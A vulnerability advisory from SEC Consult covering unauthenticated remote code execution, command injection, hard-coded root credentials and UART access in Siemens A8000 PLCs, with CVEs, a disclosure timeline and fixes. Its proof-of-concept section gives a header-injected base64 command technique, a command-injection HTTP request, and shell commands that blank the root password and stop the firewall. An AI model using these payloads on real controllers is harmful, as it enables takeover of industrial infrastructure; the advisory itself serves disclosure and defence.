Multiple Vulnerabilities including Unauthenticated Remote Code Execution in Siemens A8000


Multiple Vulnerabilities including Unauthenticated Remote Code Execution


Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00), Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00)

Vulnerable Version

<= V04.92

Fixed Version

CPCI85 V05

CVE Number

CVE-2023-28489, CVE-2023-33919, CVE-2023-33920, CVE-2023-33921






Stefan Viehböck, Christian Hager, Steffen Robertz, Gerhard Hechenberger, Gorazd Jank, Constantin Schieber-Knoebl (Office Vienna) | SEC Consult Vulnerability Lab

The Siemens A8000 CP-8050 and CP-8031 PLCs are affected by an unauthenticated Remote Code Execution (RCE) vulnerability. By sending a crafted HTTP request to the Siemens Toolbox II port 80/443, arbitrary commands can be executed without any authentication. This will lead to a full compromise of the device and may affect its operation. Furthermore, any user with access to the SICAM WEB interface can inject system commands executed as "root" via the Ethernet package capture diagnostic feature. Also a "root" password hash is hard-coded on all devices.

Vendor description

"We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers."


Business recommendation

The vendor provides a patch which should be installed immediately. Customers should update to CPCI85 V05 or later version (

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.

Vulnerability overview/description

1) Unauthenticated Remote Code Execution (CVE-2023-28489)

By sending an HTTP request with a crafted header to port 80/443 of the PLC, arbitrary commands can be executed as system user. The port is used to configure and control Siemens PLCs with the Siemens Toolbox II application and is typically accessible on such devices.

2) Authenticated Command Injection (CVE-2023-33919)

Due to missing server-side input sanitation, any user with access to the SICAM WEB interface can execute arbitrary commands as user "root" on the device. This works by setting malicious parameters and starting an Ethernet package capture.

3) Hard-coded Root Password (CVE-2023-33920)

The PLC contains a hard-coded "root" user password hash. This password hash is the same on all devices. If the corresponding password is known, it could be used to login via UART and SSH.

4) Console Login via UART (CVE-2023-33921)

The UART interface can be accessed with physical access to the PCB. After connecting to the interface, boot information is given and a login prompt is provided. Login as "root" user is possible after changing the hard-coded "root" password hash (see 1,2, and 3).

5) Hard-coded root account via SSH Authorized Keys (CVE-2023-36380)

The PLC contains a hard-coded "root" ID in the SSH "authorized_keys" configuration file. This ID is the same on all devices. If the corresponding private key is known, it can be used to login via SSH. A login/exploitation is only possible if debug support is activated on the PLC!

Proof of concept

1) Unauthenticated Remote Code Execution (CVE-2023-28489)

To exploit this vulnerability, an HTTP request including the command must be crafted. No "/" characters can be used, therefore commands are encoded as base64, e.g., "id" as "aWQ=". The command must be provided as UPLOADFILENAME header. A full command looks as follows:

;echo aWQ=| base64 -d | sh #

The following header format must be obeyed:

  • User-Agent: SICAM TOOLBOX II

Additionally, the request body must contain the following POST parameters:

  • type=20
  • length=[ARBITRARY]
  • data=[ARBITRARY]

A valid request can be seen below:

[ POC request removed ]

If it worked, the response body will be "type=21". Additionally, the output on the UART interface indicates code execution as root user:

base64: /ies/IN/_: No such file or directory
uid=0(root) gid=0(root)

Subsequently, the SSH port can be opened by sending the following commands separately and encoded as base64 string. They will replace the set default root password hash with an empty password hash, reconfigure the Dropbear SSH daemon and stop the firewall:

sed -i
re5P14Kv2zAH1:/:32BZgrJ3XBMoY:/' /etc/shadow
sed -i s'/"$DROPBEAR_ARGS -R -s -g"/"$DROPBEAR_ARGS -R"/' /etc/init.d/dropbear
/etc/init.d/dropbear restart
/etc/init.d/rc.firewall stop

After this, login via SSH as root is possible:

ssh root@[IP]
root@[IP]'s password:
~# id
uid=0(root) gid=0(root) groups=0(root),10(wheel)

2) Authenticated Command Injection (CVE-2023-33919)

To trigger the command injection vulnerability, the payload must be set in the "LAN port group" field on the SICAM WEB page "Monitoring & Simulation" -> "Ethernet Packet Capture" section "Capture configuration" (other fields may also be affected).
As the web interface only provides a drop-down menu, the payload must be set by manipulating the JavaScript logic or by directly manipulating the HTTP request as below, where "ping [IP]\nBBBBBBB" was set:

POST /sicweb-ajax/rtum85/cview HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/xml
SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT
Content-Length: 198
Origin: http: //[HOST]
Connection: close
Referer: http: //[HOST]/

<?xml version="1.0" encoding="UTF-8"?>
<Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0">
ping [IP]

The line break in the payload is especially important, as the command is executed as part of a shell script.
This script is generated and executed by pressing the "Start/Stop trace" button in the "Capture Controlling" section and saved as /tmp/ An excerpt with the injected command is shown below:

[...] # lets start tcpdump 
tcpdump -i 
ping [IP] BBBBBBB '(ether host 00:11:11:33:44:00) and (host or host and (port 999)' -C 1 -W 4 -U -w /var/log/wireshark.pcap & 

The executed script creates a process running as root user, which can be seen by running "ps" on the device: 

root        1100  0.0  0.1   1784  1168 ?        S    Feb21   0:00 /bin/sh /etc/init.d/rc.sysinit 
root        1149  0.1  0.3  11768  1748 ?        S1   Feb21   6:03  \_ /ies/apps/system/bin/ISV00.elf /ies/apps/sys_desc/target_rc.json 
www-data    1487  0.0  0.6   7568  3444 ?        S    Feb21   0:40      \_ /usr/sbin/lighttpd -Df /etc/lighttpd/lighttpd.conf 
root       10655  0.0  0.2   1880  1344 ?        S    04:55   0:00      \_ /bin/sh /tmp/ 
root       10667  0.0  0.2   1884  1360 ?        S    04:57   0:00          \_ ping [IP] 

3) Hard-coded Root Password (CVE-2023-33920)

A hard-coded "root" user password hash can be found in the /etc/shadow file:


4) Console Login via UART (CVE-2023-33921)

The serial console (UART) can be accessed on the backside of the PCB on two Vias. After removing an additional logic IC, receiving data and sending data is possible with the following UART settings:

  • Voltage: 3.3V
  • Speed: 115200 Baud
  • Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1)

Extensive boot log output can be received. Some output is shown below:

U-Boot SPL 2013.01.01 (Jan 16 2020 - 12:56:02)
BOARD : Altera SOCFPGA Cyclone V Board
CLOCK: EOSC1 clock 50000 KHz
Starting IES system
Welcome to SICAM IES

Welcome to
     _______. __    ______     ___      .___  ___.
    /       ||  |  /      |   /   \     |   \/   |
   |   (----`|  | |  ,----'  /  ^  \    |  \  /  |
    \   \    |  | |  |      /  /_\  \   |  |\/|  |
.----)   |   |  | |  `----./  _____  \  |  |  |  |
|_______/    |__|  \______/__/     \__\ |__|  |__| RTUs

sicam login: 

Additionally, a console login form is displayed. Login is possible if the password for the set "root" user password hash (see 3) is known. 

5) Hard-coded root account via SSH Authorized Keys (CVE-2023-36380)

A hard-coded SSH key ID can be found in the /root/.ssh/authorized_keys file:


Vulnerable / tested versions

The following product has been tested:

  • Siemens A8000 CP-8050 04.92
  • Siemens A8000 CP-8031 04.92

Vendor contact timeline

2023-03-14 Contacting vendor through, sending encrypted advisory
2023-03-29 Naming researchers involved
2023-03-31 Requesting state. Vulnerability 1 will be published first due to criticality. Rest will follow.
2023-04-11 Siemens releases advisory for unauthenticated RCE (Vulnerability 1, CVE-2023-28489)
2023-06-13 Siemens releases advisory for vulnerability 2, 3 and 4 (CVE-2023-33919, CVE-2023-33920, CVE-2023-33921)
2023-06-21 Siemens has additional feedback regarding the contents of the advisory.
2023-07-03 Release of security advisory.
2023-11-17 Added vulnerability 5 and new vendor solution URL, this issue was fixed at a later date.


Update to firmware CPCI85 V05 or later version, see vendor advisory for further information:


Restrict network access to the A8000 CP-8050/CP8031 module or disable the Toolbox II communication on port 80/443. Make sure to strictly limit physical access to the PLC during and also after its life cycle.

Advisory URL


EOF Stefan Viehböck, Christian Hager, Steffen Robertz, Gerhard Hechenberger, Gorazd Jank, Constantin Schieber-Knoebl / @2023


Interested to work with the experts of SEC Consult? Send us your application

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices